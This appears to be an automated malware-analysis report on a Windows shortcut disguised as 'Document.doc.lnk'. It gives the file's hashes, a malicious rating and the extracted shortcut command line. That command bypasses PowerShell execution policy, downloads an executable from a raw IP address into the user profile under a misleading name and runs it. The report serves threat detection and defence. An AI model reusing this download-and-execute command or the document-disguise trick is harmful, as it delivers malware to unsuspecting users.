Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
8bf379efd813e2b19e3c0abf2dc08f05
Sha1
74c021250ef2c027deb141d8f8b35329de082209
Sha256
70a4afab44d6a9ecd7f42ab77972be074dec8383a47a2011eb0133a230a4fae3
Sha384
f98f81746296600c9372e59930becedb6c87985ff7e6e2cf22e798c7ed5c27eed7c990a3da624589011142cfa5c34c9b
Sha512
04128b12a6071eb99ae2b16244d70ce00447ad3e613aa2038ddea59b79271d4190526dc73e6dc6c6b5cfa8bebe1b1ccc1caa76404d956e34672196480032146d
SSDeep
24:8VVJqMFXuvawAgqx+/ntSy9kerUMkWI9wCc5QgkgVBS9ZmT:8VemaquoyOerHypgkgVw9ZY
TLSH
2541C1161BD64725D3F84E3AE8BBE71099A97C1AFB138F5D0181929818516149C68F3E
File Structure
Document.doc.lnk
Malicious
LNK CommandLine
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe'
Document.doc.lnk (2.07 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙